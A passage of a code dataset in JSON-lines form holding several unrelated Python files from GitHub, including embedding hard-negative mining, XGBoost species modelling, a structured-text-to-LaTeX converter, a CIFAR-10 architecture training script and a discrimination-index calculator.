argparse.ArgumentParser()\n parser.add_argument('--model_name_or_path', default=\"BAAI/bge-large-zh-noinstruct\", type=str)\n parser.add_argument('--input_file', default='nli-zh-bge/nli_zh-train.jsonl', type=str)\n parser.add_argument('--candidate_pool', default='STS-B/STS-B.train.data', type=str)\n parser.add_argument('--output_file', default='bge_finetune_data.jsonl', type=str)\n parser.add_argument('--batch_size', default=128, type=int)\n parser.add_argument('--range_for_sampling', default='2-20', type=str, help=\"range to sample negatives\")\n parser.add_argument('--use_gpu_for_searching', action='store_true', help='use faiss-gpu')\n parser.add_argument('--negative_number', default=10, help='use faiss-gpu')\n return parser.parse_args()\n\n\ndef create_index(embeddings, use_gpu):\n index = faiss.IndexFlatIP(len(embeddings[0]))\n if use_gpu:\n print('use faiss-gpu')\n co = faiss.GpuMultipleClonerOptions()\n co.shard = True\n co.useFloat16 = True\n index = faiss.index_cpu_to_all_gpus(index, co=co)\n index.add(embeddings)\n return index\n\n\ndef batch_search(\n index,\n query,\n topk: int = 200,\n batch_size: int = 64\n):\n all_scores, all_inxs = [], []\n for start_index in tqdm(range(0, len(query), batch_size), desc=\"Batches\", disable=len(query) < batch_size):\n batch_query = query[start_index:start_index + batch_size]\n batch_scores, batch_inxs = index.search(batch_query, k=topk)\n all_scores.extend(batch_scores.tolist())\n all_inxs.extend(batch_inxs.tolist())\n return all_scores, all_inxs\n\n\ndef get_corpus(candidate_pool):\n corpus = []\n for line in open(candidate_pool, 'r', encoding='utf-8'):\n parts = line.strip().split('\\t')\n txt1 = parts[0].strip()\n txt2 = parts[1].strip()\n corpus.append(txt1)\n corpus.append(txt2)\n return corpus\n\n\ndef find_knn_neg(\n model,\n input_file,\n candidate_pool,\n output_file,\n sample_range,\n negative_number,\n use_gpu,\n batch_size\n):\n corpus = []\n queries = []\n train_data = []\n for line in open(input_file, 'r', encoding='utf-8'):\n line = json.loads(line.strip())\n train_data.append(line)\n corpus.extend(line['neg'])\n queries.append(line['query'])\n\n if candidate_pool is not None:\n corpus = get_corpus(candidate_pool)\n corpus = list(set(corpus))\n\n print(f'inference embedding for corpus (number={len(corpus)})--------------')\n p_vecs = model.encode(corpus, batch_size=batch_size, normalize_embeddings=True)\n print(f'inference embedding for queries (number={len(queries)})--------------')\n q_vecs = model.encode(queries, batch_size=batch_size, normalize_embeddings=True)\n\n print('create index and search------------------')\n index = create_index(p_vecs, use_gpu=use_gpu)\n _, all_inxs = batch_search(index, q_vecs, topk=sample_range[-1], batch_size=batch_size)\n assert len(all_inxs) == len(train_data)\n\n for i, data in enumerate(train_data):\n query = data['query']\n inxs = all_inxs[i][sample_range[0]:sample_range[1]]\n filtered_inx = []\n for inx in inxs:\n if inx == -1:\n break\n if corpus[inx] not in data['pos'] and corpus[inx] != query:\n filtered_inx.append(inx)\n\n if len(filtered_inx) > negative_number:\n filtered_inx = random.sample(filtered_inx, negative_number)\n data['neg'] = [corpus[inx] for inx in filtered_inx]\n\n with open(output_file, 'w', encoding='utf-8') as f:\n for data in train_data:\n if len(data['neg']) < negative_number:\n data['neg'].extend(random.sample(corpus, negative_number - len(data['neg'])))\n f.write(json.dumps(data, ensure_ascii=False) + '\\n')\n\n\nif __name__ == '__main__':\n args = get_args()\n 
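# range_for_sampling is a string like 2-20; it is split into [begin, end) sample indices below\n    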
print(args)\n sample_range = args.range_for_sampling.split('-')\n sample_range = [int(x) for x in sample_range]\n\n model = SentenceModel(args.model_name_or_path)\n\n find_knn_neg(\n model,\n input_file=args.input_file,\n candidate_pool=args.candidate_pool,\n output_file=args.output_file,\n sample_range=sample_range,\n negative_number=args.negative_number,\n use_gpu=args.use_gpu_for_searching,\n batch_size=args.batch_size\n )\n","repo_name":"shibing624/text2vec","sub_path":"examples/data/hard_negatives_mine.py","file_name":"hard_negatives_mine.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":3412,"dataset":"github-code","pt":"19"} +{"seq_id":"20501614705","text":"'''\n- extract all pixel information from the images to a csv file\n- use average pixel value of each channel and round to 2 decimals (save as csv)\n- used columns \"latitude\" and \"longitude\" from occurrences and merge all information to one csv\n- calculate species groups with similar species:\n - remove species which occur < 10\n - look at the most common values for each species\n - calculate difference\n - take threshold '3' for building groups -> 2090 groups (366 species in groups with size greater than 1)\n- predict each group with one model separately (2090 different models)\n- each group contained several species which were ordered with regard of their probability in the trainset. After predicting a group on the testset we counted this prediction as predicting all classes of the group with descending probabilities.\nTest-mrr with groups: 0.022000386535744\n'''\n\nimport pandas as pd\nimport numpy as np\nimport xgboost as xgb\nimport matplotlib.pyplot as plt\nimport multiprocessing as mp\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import log_loss\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\n\nfrom geo.models.settings import seed\nfrom geo.models.settings import train_val_split\nfrom geo.models.settings import TOP_N_SUBMISSION_RANKS\nfrom geo.models.data_paths import xgb_multimodel_groups_submission\nfrom geo.preprocessing.preprocessing import create_datasets\nfrom geo.preprocessing.preprocessing import extract_groups\nfrom geo.preprocessing.species_occurences import extract_species_occurences\nfrom geo.preprocessing.species_occurences import load_species_occurences\nfrom geo.data_paths import train_with_groups\nfrom geo.data_paths import test\nfrom geo.data_paths import named_groups\nfrom geo.metrics.mrr import mrr_score\nfrom geo.logging.log import log_start\nfrom geo.logging.log import log_end_xgb\nfrom geo.postprocessing.submission_maker import _make_submission_groups\nfrom geo.postprocessing.submission_maker import make_submission_groups_df\nfrom geo.postprocessing.get_ranks import get_ranks\n\ntrain_columns = [ \n 'chbio_1', 'chbio_2', 'chbio_3', 'chbio_4', 'chbio_5', 'chbio_6',\n 'chbio_7', 'chbio_8', 'chbio_9', 'chbio_10', 'chbio_11', 'chbio_12',\n 'chbio_13', 'chbio_14', 'chbio_15', 'chbio_16', 'chbio_17', 'chbio_18','chbio_19', \n 'etp', 'alti', 'awc_top', 'bs_top', 'cec_top', 'crusting', 'dgh', 'dimp', 'erodi', 'oc_top', 'pd_top', 'text',\n 'proxi_eau_fast', 'clc', 'latitude', 'longitude'\n]\n\n# setting the parameters for xgboost\nparams = {\n 'objective': 'binary:logistic',\n 'max_depth': 2,\n 'seed': 4242,\n 'silent': 1,\n 'eval_metric': 'logloss', # because we want to evaluate floats\n 'num_boost_round': 500,\n 'early_stopping_rounds': 10,\n 'verbose_eval': None,\n 'updater': 'grow_gpu',\n 'predictor': 
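# GPU-specific settings; these assume an XGBoost build compiled with CUDA support\n    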
'gpu_predictor',\n 'tree_method': 'gpu_hist'\n}\n\ndef run_multi_model_with_groups(use_multithread=True):\n log_start()\n print(\"Running xgboost multi model with groups...\")\n create_datasets()\n extract_groups()\n x_text = pd.read_csv(train_with_groups)\n extract_species_occurences()\n species_occ = load_species_occurences()\n n_groups = np.load(named_groups)\n species_occ_dict = {}\n for _, row in species_occ.iterrows():\n species_occ_dict[row[\"species\"]] = row[\"percents\"]\n \n x_test = pd.read_csv(test) \n y = x_text[\"species_glc_id\"]\n\n class_names = np.unique(y)\n\n x_train, x_valid, y_train, y_valid = train_test_split(x_text, y, test_size=train_val_split, random_state=seed)\n test_glc_ids = list(x_test[\"patch_id\"])\n valid_glc_ids = list(x_valid[\"patch_id\"])\n x_train = x_train[train_columns]\n x_valid = x_valid[train_columns]\n x_test = x_test[train_columns]\n\n if use_multithread:\n num_cores = mp.cpu_count()\n print(\"Cpu count:\", str(num_cores))\n result = Parallel(n_jobs=num_cores)(delayed(predict_species)(class_name,x_train, x_valid, x_test, y_train, y_valid) for class_name in tqdm(class_names))\n else:\n result = []\n for class_name in tqdm(class_names):\n result.append(predict_species(class_name, x_train, x_valid, x_test, y_train, y_valid))\n\n species = np.array([x for x, _, _ in result])\n #transpose because each species is a column\n predictions = np.array([y for _, y, _ in result]).T \n test_predictions = np.array([z for _, _, z in result]).T\n\n species_map = species\n species_count = len(species_map)\n valid_predictions = predictions\n test_predictions = test_predictions\n\n assert len(valid_predictions) == len(y_valid.index)\n assert len(test_predictions) == len(x_test.index)\n assert len(valid_predictions[0]) == species_count\n assert len(test_predictions[0]) == species_count\n\n print(\"Create test submission...\") \n df = make_submission_groups_df(TOP_N_SUBMISSION_RANKS, species_map, test_predictions, test_glc_ids, n_groups, species_occ_dict)\n df.to_csv(xgb_multimodel_groups_submission, index=False, sep=\";\", header=None)\n print(\"Finished.\", xgb_multimodel_groups_submission)\n\n print(\"Evaluate validation set...\") \n subm = _make_submission_groups(TOP_N_SUBMISSION_RANKS, species_map, valid_predictions, valid_glc_ids, n_groups, species_occ_dict)\n ranks = get_ranks(subm, y_valid, TOP_N_SUBMISSION_RANKS)\n score = mrr_score(ranks)\n print(\"MRR-Score:\", score * 100, \"%\")\n log_end_xgb(\"XGBoost Multi Model With Groups\", train_columns, params, score)\n\ndef predict_species(species, x_train, x_valid, x_test, y_train, y_valid):\n train_target = list(map(lambda x: 1 if x == species else 0, y_train))\n val_target = list(map(lambda x: 1 if x == species else 0, y_valid))\n d_train = xgb.DMatrix(x_train, label=train_target)\n d_valid = xgb.DMatrix(x_valid, label=val_target)\n d_test = xgb.DMatrix(x_test)\n watchlist = [(d_train, 'train'), (d_valid, 'valid')]\n \n bst = xgb.train(\n params, \n d_train, \n num_boost_round=params[\"num_boost_round\"], \n verbose_eval=params[\"verbose_eval\"],\n evals=watchlist, \n early_stopping_rounds=params[\"early_stopping_rounds\"]\n )\n\n plt_features(bst, d_train)\n pred = bst.predict(d_valid, ntree_limit=bst.best_ntree_limit)\n #print(\"validation-logloss for\", str(species) + \":\", log_loss(val_target, pred))\n pred_test = bst.predict(d_test, ntree_limit=bst.best_ntree_limit)\n\n return (species, pred, pred_test)\n\ndef plt_features(bst, d_test):\n print(\"Plot feature importances...\")\n _, ax = 
plt.subplots(figsize=(12,18))\n    xgb.plot_importance(bst, color='red', ax=ax)\n    plt.show()\n\nif __name__ == '__main__':\n    run_multi_model_with_groups(use_multithread=True)","repo_name":"stefantaubert/lifeclef-geo-2018","sub_path":"geo/models/xgb/multi_model_with_groups.py","file_name":"multi_model_with_groups.py","file_ext":"py","file_size_in_byte":6692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"8564223389","text":"class LaTeXClass:\n    \"\"\"LaTeXClass parses structured text into LaTeX.\"\"\"\n\n    element_types={\n        '#text': '_text',\n        'StructuredTextDocument': 'document',\n        'StructuredTextParagraph': 'paragraph',\n        'StructuredTextExample': 'example',\n        'StructuredTextBullet': 'bullet',\n        'StructuredTextNumbered': 'numbered',\n        'StructuredTextDescription': 'description',\n        'StructuredTextDescriptionTitle': 'descriptionTitle',\n        'StructuredTextDescriptionBody': 'descriptionBody',\n        'StructuredTextSection': 'section',\n        'StructuredTextSectionTitle': 'sectionTitle',\n        'StructuredTextLiteral': 'literal',\n        'StructuredTextEmphasis': 'emphasis',\n        'StructuredTextStrong': 'strong',\n        'StructuredTextLink': 'link',\n        'StructuredTextXref': 'xref',\n        'StructuredTextInnerLink':'innerLink',\n        'StructuredTextNamedLink':'namedLink',\n        'StructuredTextUnderline':'underline',\n        'StructuredTextTable':'table',\n        'StructuredTextSGML':'sgml',\n        }\n\n\n    def dispatch(self, doc, level, output):\n        getattr(self, self.element_types[doc.getNodeName()])(\n            doc, level, output)\n    \n    def __call__(self, doc, level=1, header=1):\n        r = []\n        self.header = header\n        self.dispatch(doc, level-1, r.append)\n        return ''.join(r)\n\n    def _text(self, doc, level, output):\n        output(tex_quote((doc.getNodeValue())))\n\n    def document(self, doc, level, output):\n        children = doc.getChildNodes()\n\n        output(\"%begin document\\n\")\n\n#        if (children and\n#            children[0].getNodeName() == 'StructuredTextSection'):\n#            output('\\n%s\\n\\n' %\n#                   children[0].getChildNodes()[0].getNodeValue())\n        \n        for c in children:\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n\n        output(\"%end document\\n\")\n\n\n    def section(self, doc, level, output):\n        children = doc.getChildNodes()\n        for c in children:\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level+1, output)\n    \n    def sectionTitle(self, doc, level, output):\n        sections = ['chapter', 'section', 'subsection',\n                    'subsubsection', 'paragraph', 'subparagraph']\n        \n        output('\\\\%s{' % sections[level])\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n        output('}\\n')\n\n    def description(self, doc, level, output):\n        p = doc.getPreviousSibling()\n        if p is None or p.getNodeName() != doc.getNodeName(): \n            output('\\\\begin{description}\\n')\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n        n = doc.getNextSibling()\n        if n is None or n.getNodeName() != doc.getNodeName(): \n            output('\\\\end{description}\\n')\n    \n    def descriptionTitle(self, doc, level, output):\n        output('\\\\item[')\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n        output('] ')\n    \n    def descriptionBody(self, doc, level, output):\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n        output('\\n')\n\n    def bullet(self, doc, level, output):\n        p = doc.getPreviousSibling()\n        if p is None or p.getNodeName() != 
    def bullet(self, doc, level, output):\n        p = doc.getPreviousSibling()\n        if p is None or p.getNodeName() != doc.getNodeName():\n            output('\\n\\\\begin{itemize}\\n')\n        output('\\\\item ')\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n        n = doc.getNextSibling()\n        output('\\n')\n        if n is None or n.getNodeName() != doc.getNodeName():\n            output('\\n\\\\end{itemize}\\n')\n\n    def numbered(self, doc, level, output):\n        p = doc.getPreviousSibling()\n        if p is None or p.getNodeName() != doc.getNodeName():\n            output('\\n\\\\begin{enumerate}\\n')\n        output('\\\\item ')\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n        n = doc.getNextSibling()\n        output('\\n')\n        if n is None or n.getNodeName() != doc.getNodeName():\n            output('\\\\end{enumerate}\\n')\n\n    def example(self, doc, level, output):\n        i = 0\n        for c in doc.getChildNodes():\n            if i == 0:\n                output('\\n\\\\begin{verbatim}\\n')\n                output(c.getNodeValue())\n                output('\\n\\\\end{verbatim}\\n')\n            else:\n                getattr(self, self.element_types[c.getNodeName()])(\n                    c, level, output)\n            # advance the counter so only the first child is treated as the verbatim body\n            i += 1\n\n    def paragraph(self, doc, level, output):\n        output('\\n\\n')\n        for c in doc.getChildNodes():\n            if c.getNodeName() in ['StructuredTextParagraph']:\n                getattr(self, self.element_types[c.getNodeName()])(\n                    c, level, output)\n            else:\n                getattr(self, self.element_types[c.getNodeName()])(\n                    c, level, output)\n                output('\\\\par\\n')\n\n    def link(self, doc, level, output):\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n        output('(\\\\texttt{%s})' % doc.href)\n\n    def emphasis(self, doc, level, output):\n        # \\emph takes its argument in braces; '{\\emph' produced broken LaTeX\n        output('\\\\emph{')\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n        output('}')\n\n    def literal(self, doc, level, output):\n        output('\\\\begin{verbatim}')\n        for c in doc.getChildNodes():\n            # verbatim text must be emitted as-is; HTML escaping via the\n            # unimported cgi module would be wrong for LaTeX\n            output(c.getNodeValue())\n        output('\\\\end{verbatim}')\n\n    def strong(self, doc, level, output):\n        output('\\\\textbf{')\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n        output('}')\n\n    def underline(self, doc, level, output):\n#        output(\"\")\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n#        output(\"\")\n\n    def innerLink(self, doc, level, output):\n#        output('[')\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n#        output(']')\n\n    def namedLink(self, doc, level, output):\n#        output('[')\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n#        output(']')\n\n    def sgml(self, doc, level, output):\n        for c in doc.getChildNodes():\n            getattr(self, self.element_types[c.getNodeName()])(\n                c, level, output)\n\n    def xref(self, doc, level, output):\n        val = doc.getNodeValue()\n        output(val)\n\n    def table(self, doc, level, output):\n        \"\"\"A StructuredTextTable holds StructuredTextRow(s) which\n        holds StructuredTextColumn(s). A StructuredTextColumn is a\n        type of StructuredTextParagraph and thus holds the actual\n        data.\"\"\"\n\n        output(\"\\\\textbf{Tables not yet supported in STX\"\n               \"$\\\\rightarrow$ \\\\LaTeX conversions.}\")\n        return None\n        # Unreachable legacy code: it still emits the HTML markup inherited\n        # from the HTML renderer this class was adapted from.\n        output('<table>\\n')\n        for row in doc.getRows()[0]:\n            output(\"<tr>\\n\")\n            for column in row.getColumns()[0]:\n                if hasattr(column,\"getAlign\"):\n                    str = '<%s colspan=\"%s\" align=\"%s\" valign=\"%s\">' % (column.getType(),\n                                                                       column.getSpan(),\n                                                                       column.getAlign(),\n                                                                       column.getValign())\n                else:\n                    str = '<td colspan=\"%s\">' % column.getSpan()\n                output(str)\n                for c in column.getChildNodes():\n                    getattr(self, self.element_types[c.getNodeName()])(c, level, output)\n                if hasattr(column,\"getType\"):\n                    output(\"</%s>\\n\" % column.getType())\n                else:\n                    output(\"</td>\\n\")\n            output(\"</tr>\\n\")\n        output(\"</table>\\n\")\n","repo_name":"gocept/Products.DTMLTeX","sub_path":"LaTeXClass.py","file_name":"LaTeXClass.py","file_ext":"py","file_size_in_byte":9097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"28862893359","text":"import argparse\r\nimport shutil\r\n\r\nimport torchvision.models\r\n\r\nimport train_operation as operation\r\nimport model_genotype as genotype\r\nimport models\r\n\r\nimport torch\r\nimport torch.utils.data\r\nimport torch.optim as optim\r\nimport torch.backends.cudnn as cudnn\r\nimport torch.nn as nn\r\nimport torchvision.transforms as transforms\r\nfrom tensorboardX import SummaryWriter\r\nimport sys\r\nimport numpy as np\r\nimport logging\r\nimport time\r\nimport os\r\n\r\n# =================================================================================\r\n# set arguments for Terminal input\r\nparser = argparse.ArgumentParser(\"Train an architecture created by genome\")\r\nparser.add_argument('--genofile', type=str, default=None, help='genome file path')\r\nparser.add_argument('--n_geno', type=int, default=1, help='No. of genome in file')\r\n\r\nparser.add_argument('--save', type=str, default='train', help='experiment name')\r\nparser.add_argument('--seed', type=int, default=0, help='random seed')\r\n\r\nparser.add_argument('--n_blocks', type=int, default=5, help='number of blocks in a cell')\r\nparser.add_argument('--n_nodes', type=int, default=4, help='number of nodes per phase')\r\n\r\nparser.add_argument('--init_channels', type=int, default=36, help='channels of filters for first cell')\r\nparser.add_argument('--layers', type=int, default=20, help='number of layers of the networks')\r\nparser.add_argument('--epochs', type=int, default=600, help='training epochs for each individual')\r\n\r\nparser.add_argument('--device', type=str, default='cuda:0', help='GPU/CPU device selected')\r\n\r\nargs = parser.parse_args()\r\nargs.save = '{}-{}'.format(args.save, time.strftime(\"%Y%m%d-%H%M%S\"))\r\n\r\n\r\ndevice = args.device if torch.cuda.is_available() else 'cpu'\r\n\r\nsys.path.insert(0, '/data/sunliang/sunliang/projects/nas')\r\n\r\n# =================================================================================\r\ndef mkdir_save(path, scripts_to_save=None):\r\n    if not os.path.exists(path):\r\n        os.mkdir(path)\r\n    # print(f'Experiment directory: {path}')\r\n\r\n    if scripts_to_save is not None:\r\n        os.mkdir(os.path.join(path, 'scripts'))\r\n        for script in scripts_to_save:\r\n            dst_file = os.path.join(path, 'scripts', os.path.basename(script))\r\n            shutil.copyfile(script, dst_file)\r\n\r\n\r\nmkdir_save(args.save)\r\nlog_format = '%(asctime)s %(message)s'\r\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO,\r\n                    format=log_format, datefmt='%m/%d %I:%M:%S %p')\r\nfh = logging.FileHandler(os.path.join(args.save, 'log.txt'))\r\nfh.setFormatter(logging.Formatter(log_format))\r\nlogging.getLogger().addHandler(fh)\r\n\r\n\r\ndef cifar10_transforms():\r\n    CIFAR_MEAN = [0.49139968, 0.48215827, 0.44653124]\r\n    CIFAR_STD = [0.24703233, 0.24348505, 0.26158768]\r\n\r\n    train_transform = transforms.Compose([\r\n        transforms.RandomCrop(32, padding=4),\r\n        transforms.RandomHorizontalFlip(),\r\n        transforms.ToTensor()\r\n    ])\r\n\r\n    train_transform.transforms.append(transforms.Normalize(CIFAR_MEAN, CIFAR_STD))\r\n\r\n    valid_transform = transforms.Compose([\r\n        transforms.ToTensor(),\r\n        transforms.Normalize(CIFAR_MEAN, CIFAR_STD)\r\n    ])\r\n    return train_transform, valid_transform\r\n\r\n\r\ndef load_genome(file, 
number=1):\r\n genome = []\r\n s = \"\"\r\n with open(file) as f:\r\n for i in range(number):\r\n s = f.readline()\r\n genome = list(map(int, s.split(' ')[:-1]))\r\n return genome\r\n\r\n\r\ndef main():\r\n\r\n writer = SummaryWriter(logdir=os.path.join(args.save, 'logs'))\r\n\r\n seed = args.seed\r\n torch.cuda.set_device(device)\r\n cudnn.enabled = True\r\n cudnn.benchmark = True\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed(seed)\r\n\r\n # genome = genotype.test_genome\r\n # geno = genotype.decode(genome)\r\n # geno = genotype.TestNet\r\n genome = load_genome(args.genofile, args.n_geno)\r\n geno = genotype.decode(genome)\r\n net = models.NetworkCIFAR(C=args.init_channels, num_classes=10, layers=args.layers, auxiliary=True, genotype=geno).to(device)\r\n\r\n train_transform, valid_transform = cifar10_transforms()\r\n train_set = torchvision.datasets.CIFAR10(root='../data/', train=True, transform=train_transform, download=True)\r\n valid_set = torchvision.datasets.CIFAR10(root='../data/', train=False, transform=valid_transform, download=True)\r\n\r\n train_loader = torch.utils.data.DataLoader(train_set, batch_size=96, shuffle=True, num_workers=2, pin_memory=True)\r\n valid_loader = torch.utils.data.DataLoader(valid_set, batch_size=96, shuffle=False, num_workers=2, pin_memory=True)\r\n\r\n dummy_input = torch.rand(2, 3, 32, 32).to(device)\r\n writer.add_graph(net, [dummy_input, ])\r\n n_flops, n_params = operation.get_flops(net, device)\r\n\r\n logging.info(f'genome: {genome}\\n\\n')\r\n logging.info(f'genotype: {geno}\\n\\n')\r\n logging.info(f'FLOPs: {n_flops / 1e6} M\\n')\r\n logging.info(f'Params: {n_params / 1e6} M\\n')\r\n\r\n with open(os.path.join(args.save, 'result'), 'a') as f:\r\n f.write(f'genome: {genome}\\n\\n')\r\n f.write(f'genotype: {geno}\\n\\n')\r\n f.write(f'FLOPs: {n_flops / 1e6} M\\n')\r\n f.write(f'Params: {n_params / 1e6} M\\n')\r\n\r\n epochs = args.epochs\r\n\r\n parameters = filter(lambda p: p.requires_grad, net.parameters())\r\n criterion = nn.CrossEntropyLoss().to(device)\r\n optimizer = optim.SGD(parameters, lr=0.025, momentum=0.9, weight_decay=3e-4)\r\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, epochs, eta_min=0.0)\r\n # optimizer = optim.Adam(parameters, lr=0.03)\r\n valid_acc = 0.0\r\n for epoch in range(epochs):\r\n logging.info(f'epoch {epoch} lr {scheduler.get_lr()[0]}')\r\n\r\n train_loss, train_acc = train(train_loader, net, criterion, optimizer)\r\n valid_loss, valid_acc = infer(valid_loader, net, criterion)\r\n scheduler.step()\r\n torch.save(net.state_dict(), os.path.join(args.save, 'weight.pth'))\r\n\r\n logging.info(f'epoch {epoch+1}/{epochs}\\tloss:{train_loss}\\tacc:{valid_acc}')\r\n writer.add_scalar('loss', train_loss, epoch+1)\r\n writer.add_scalar('Accuracy', valid_acc, epoch+1)\r\n\r\n writer.close()\r\n with open(os.path.join(args.save, 'result'), 'a') as f:\r\n f.write(f'Accuracy: {valid_acc}\\n')\r\n logging.info(f\"output result file: {os.path.join(args.save, 'result')}\")\r\n logging.info(f\"save model weight in file: {os.path.join(args.save, os.path.join(args.save, 'weight.pth'))}\")\r\n\r\n\r\ndef train(train_loader, net, criterion, optimizer, auxiliary=False):\r\n net.train()\r\n train_loss = 0\r\n correct = 0\r\n total = 0\r\n\r\n for step, (inputs, targets) in enumerate(train_loader):\r\n inputs, targets = inputs.to(device), targets.to(device)\r\n optimizer.zero_grad()\r\n outputs, outputs_aux = net(inputs)\r\n loss = criterion(outputs, targets)\r\n\r\n if auxiliary:\r\n loss_aux = 
criterion(outputs_aux, targets)\r\n loss += loss_aux * 0.4\r\n\r\n loss.backward()\r\n nn.utils.clip_grad_norm_(net.parameters(), 5)\r\n optimizer.step()\r\n\r\n train_loss += loss.item()\r\n _, predicted = outputs.max(1)\r\n total += targets.size(0)\r\n correct += predicted.eq(targets).sum().item()\r\n\r\n logging.info('train acc %f', 100. * correct / total)\r\n\r\n return train_loss / total, 100.*correct/total\r\n\r\n\r\ndef infer(valid_loader, net, criterion):\r\n net.eval()\r\n test_loss = 0\r\n correct = 0\r\n total = 0\r\n\r\n with torch.no_grad():\r\n for step, (inputs, targets) in enumerate(valid_loader):\r\n inputs, targets = inputs.to(device), targets.to(device)\r\n outputs, _ = net(inputs)\r\n loss = criterion(outputs, targets)\r\n\r\n test_loss += loss.item()\r\n _, predicted = outputs.max(1)\r\n total += targets.size(0)\r\n correct += predicted.eq(targets).sum().item()\r\n\r\n acc = 100. * correct / total\r\n logging.info('valid acc %f', 100. * correct / total)\r\n\r\n return test_loss / total, acc\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"szu-advtech/AdvTech","sub_path":"2022/13-孙亮 指导老师-周杰/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"9044054737","text":"# -*-coding:utf-8 -*-\n\n\"\"\"\nCalc the Polytomous Discrimination Index(PDI)\naccording to\nExtending the c-statistic to nominal polytomous outcomes: the Polytomous Discrimination Index\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\n\ndef calc_pdi(y, preds, classes):\n \"\"\"\n :param y: 1-dim label numpy array of samples\n\n :param preds: 2-dim probability numpy array of samples\n\n :param classes: array-like of shape [n_classes]\n Uniquely holds the label for each class.\n\n :return: [dpi, category_dpi_0, category_dpi_1, category_dpi_2]\n \"\"\"\n probs_0 = preds[y == classes[0]]\n probs_1 = preds[y == classes[1]]\n probs_2 = preds[y == classes[2]]\n total = len(probs_0) * len(probs_1) * len(probs_2)\n dpis = []\n for i in range(3):\n cnt = 0\n for prob_0 in probs_0:\n for prob_1 in probs_1:\n for prob_2 in probs_2:\n mat = np.vstack((prob_0, prob_1, prob_2))\n if np.argmax(mat[:, i]) == i:\n cnt += 1\n dpis.append(cnt / total)\n return [np.average(dpis), ] + dpis\n\n\nif __name__ == '__main__':\n filename = 'data/pdi/input.csv'\n\n df = pd.read_csv(filename)\n\n y = np.array(df['label'])\n preds = np.array(df.iloc[:, 1:4])\n classes = df.columns[1:]\n\n result = calc_pdi(y, preds, classes)\n\n print(\"dpi: %.3f\" % result[0])\n for i in range(3):\n print(\"category_dpi_%s: %.3f\" % (classes[i], result[i + 1]))\n","repo_name":"cilcmc/dlrcc","sub_path":"evaluation/pdi.py","file_name":"pdi.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17923989447","text":"from ..enums import enums\n\n\ndef percent_change(_start_point, _current_point):\n try:\n if _start_point > _current_point:\n x = -((float(_start_point) - float(_current_point)) / abs(_current_point)) * 100\n else:\n x = ((float(_current_point) - float(_start_point)) / abs(_start_point)) * 100\n if x == 0.0:\n return 0.000000001\n else:\n return x\n except:\n return 0.000000001\n\n\nclass PercentageSimilarity:\n def __init__(self, constants, _pattern_array, _performance_array):\n self.constants = constants\n self._pattern_array = list(_pattern_array)\n self._performance_array = 
list(_performance_array)\n\n    def get_predicted_outcomes(self, pattern):\n        \"\"\"\n        This function goes through all the data in the arrays and returns the amount of similar patterns\n        :param pattern:\n        :return: returns the predicted outcomes array which holds all the outcomes from the similar patterns\n        \"\"\"\n        # This is the array of predicted outcomes from all the patterns\n        _predicted_outcomes_array = []\n        # iterates through the historic data array to find similar patterns\n        for b in range(len(self._pattern_array)):\n            # Uses a should-skip boolean to check whether to skip the current pattern completely\n            _should_skip = False\n            # Gets the pattern that it will use\n            _each_pattern = self._pattern_array[b]\n            # Goes through the pattern and sees if each percentage change is within the right limit, else continue\n            for i in range(0, self.constants.get_pattern_len() - 1, 1):\n                if abs(percent_change(_each_pattern[i], pattern[i])) > 500:\n                    _should_skip = True\n                    break\n            # Only skips if one of the data points is too far out and doesn't meet the requirement\n            if _should_skip:\n                continue\n            # If it all passes, then it appends the result of that array to the array that holds all the results\n            _predicted_outcomes_array.append(self._performance_array[b])\n        # returns that array\n        return _predicted_outcomes_array\n\n    def get_result_of_pc(self, pattern):\n\n        _predicted_outcomes_array = self.get_predicted_outcomes(pattern)\n\n        # Calculates the number of patterns found from the returned array of previous outcomes\n        _num_patterns_found = len(_predicted_outcomes_array)\n        # If the number is greater than the required amount, it can continue\n        if _num_patterns_found > self.constants.get_num_pattern_req():\n            # It averages the outcome of all the numbers in the array to get an average outcome\n            # (sum replaces the Python 2 built-in reduce, which was never imported)\n            _predicted_avg_outcome = sum(_predicted_outcomes_array) / _num_patterns_found\n\n            # It then decides whether the 'difference' is great enough to be worthy of a trade\n            # Initialises the _option to NO_TRADE so a missing difference cannot cause an error\n            _option = enums.Option.NO_TRADE\n            if _predicted_avg_outcome < -self.constants.get_required_difference():\n                # SELLS\n                _option = enums.Option.SELL\n            elif 